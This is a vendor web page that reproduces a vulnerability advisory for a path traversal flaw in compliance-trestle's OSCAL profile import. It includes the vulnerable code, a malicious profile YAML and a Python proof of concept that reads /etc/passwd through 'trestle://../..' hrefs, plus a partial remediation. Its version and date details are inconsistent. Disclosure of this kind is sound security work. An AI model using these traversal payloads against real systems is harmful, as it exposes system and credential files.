Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-45774 — compliance-trestle

⚪ Unknown ✅ No Known Exploit CWE-22 NVD
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

compliance-trestle Profile Import has an Arbitrary File Read via trestle:// URI and Relative Path Traversal

Summary

The compliance-trestle library's profile import mechanism resolves trestle:// URIs and relative file paths by joining them with trestle_root and calling .resolve(), but performs no boundary check to ensure the resolved path stays within the trestle workspace. An attacker can craft a malicious OSCAL profile YAML with imports[].href containing path traversal sequences to read arbitrary files from the server filesystem.

Three attack vectors confirmed:

1. PT-001: trestle://../../etc/passwd — via trestle:// URI scheme

2. PT-002: ../../etc/passwd — via relative path in href

3. PT-003: back_matter rlinks with traversal paths

Preconditions: Victim must import/resolve an attacker-controlled OSCAL profile YAML.

Affected Component

Repository: https://github.com/IBM/compliance-trestle

File: trestle/core/remote/cache.py (lines 175-179)

File: trestle/core/resolver/_import.py (line 104)

Version: v4.0.2 (latest as of 2026-04-30)

Vulnerable Code

cache.py:175-179 — LocalFetcher (trestle:// URI handling)

```python

class LocalFetcher(FetcherBase):

def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:

super().__init__(trestle_root, uri)

# ...

elif uri.startswith(const.TRESTLE_HREF_HEADING):

uri = str(trestle_root / uri[len(const.TRESTLE_HREF_HEADING) :])

self._abs_path = pathlib.Path(uri).resolve()

# ❌ NO boundary check — .resolve() follows ../

# ❌ NO is_relative_to() validation

# ❌ Result can be /etc/passwd

self._cached_object_path = self._abs_path

return

```

cache.py:194 — LocalFetcher (relative path handling)

```python

# For relative paths (no trestle:// or file:// prefix):

try:

self._abs_path = pathlib.Path(uri).resolve()

# ❌ Same issue — resolves relative to CWD with no boundary check

except Exception:

raise TrestleError(...)

```

_import.py:73-104 — Profile import href resolution

```python

class Import(Pipeline.Filter):

def __init__(self, ...):

# Line 73-83: back_matter rlinks used directly

if self._import.href[0] == '#':

resource = [r for r in self._resources if r.uuid == self._import.href[1:]][0]

self._import.href = [

rlink.href # ❌ rlink.href from OSCAL data — user-controlled

for rlink in resource.rlinks

if rlink.href.endswith('.json') or rlink.href.endswith('.yaml')

][0]

# Line 104: href passed directly to FetcherFactory

fetcher = cache.FetcherFactory.get_fetcher(self._trestle_root, self._import.href)

```

Root Cause:

1. Path(trestle_root / "../../etc/passwd").resolve() = /etc/passwd

2. No is_relative_to(trestle_root) check after resolve

3. TRESTLE_HREF_REGEX defined at const.py:253 but NEVER enforced (dead code)

4. Even if enforced, the regex '^trestle://[^/]' would PASS traversal payloads (. is [^/])

Steps to Reproduce

Prerequisites

```bash

pip install compliance-trestle==4.0.2

```

PoC: Malicious OSCAL Profile

```yaml

# malicious_profile.yaml

profile:

uuid: "550e8400-e29b-41d4-a716-446655440000"

metadata:

title: "Malicious Profile"

version: "1.0"

last-modified: "2024-01-01T00:00:00+00:00"

oscal-version: "1.0.4"

imports:

  • href: "trestle://../../../../../../etc/passwd"

```

PoC: Direct LocalFetcher Exploit

```python

#!/usr/bin/env python3

"""PoC: trestle:// path traversal via real LocalFetcher"""

from pathlib import Path

from trestle.core.remote.cache import LocalFetcher

import tempfile

trestle_root = Path(tempfile.mkdtemp())

# Normal usage — stays within workspace

normal = LocalFetcher(trestle_root, "trestle://catalogs/test/catalog.json")

print(f"Normal: {normal._abs_path}") # /tmp/xxx/catalogs/test/catalog.json

# Exploit — escapes workspace

evil = LocalFetcher(trestle_root, "trestle://../../../../../../etc/passwd")

print(f"Evil: {evil._abs_path}") # /etc/passwd

print(f"Content: {evil._abs_path.read_text().split(chr(10))[0]}")

# Output: root:x:0:0:root:/root:/bin/bash

```

Expected: Path traversal blocked with error

Actual: /etc/passwd, /etc/shadow, /proc/self/environ read successfully

Remediation

```python

class LocalFetcher(FetcherBase):

def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:

super().__init__(trestle_root, uri)

# ...

elif uri.startswith(const.TRESTLE_HREF_HEADING):

uri = str(trestle_root / uri[len(const.TRESTLE_HREF_HEADING) :])

self._abs_path = pathlib.Path(uri).resolve()

# ✅ ADD: Boundary check

if not self._abs_path.is_relative_to(self._trestle_root):

raise TrestleError(

f"Path tr

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. A user must actively cooperate. Rated impact: confidentiality high, integrity none, availability none.

CVSS metrics in full

The score comes from this vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Attack requirements: None — no deployment-specific condition has to hold.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: Active — the victim has to cooperate with the attack.
  • Confidentiality impact: High — total loss, or loss the attacker controls.
  • Integrity impact: None.
  • Availability impact: None.

Weakness class

CVE-2026-45774 is classified as CWE-22: Path Traversal. A file path built from user input is not confined to the intended directory, letting an attacker reach files elsewhere on the filesystem.

Affected software

CVE-2026-45774 is recorded against 2 packages.

  • compliance-trestle (fixed in 3.12.2)
  • unknown

Timeline and source

Published on 28 May 2026 and last revised on 13 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com (Web)
github.com (Web)
github.com (Web)
github.com (Package)

Other advisories for this package

compliance-trestle has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-22: Path Traversal) in other software:

Details

Severity Unknown
CVSS Score N/A
CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
CWE CWE-22
Public Exploit ✅ No
Source NVD
Published 2026-05-28
Updated 2026-08-20
Modified 2026-07-13
Fix URL N/A

Affected Packages

Software From version Fixed in
compliance-trestle 3.12.2
unknown

Similar Threats

Free Vulnerability Check

Is your site affected by CVE-2026-45774?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against CVE-2026-45774 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026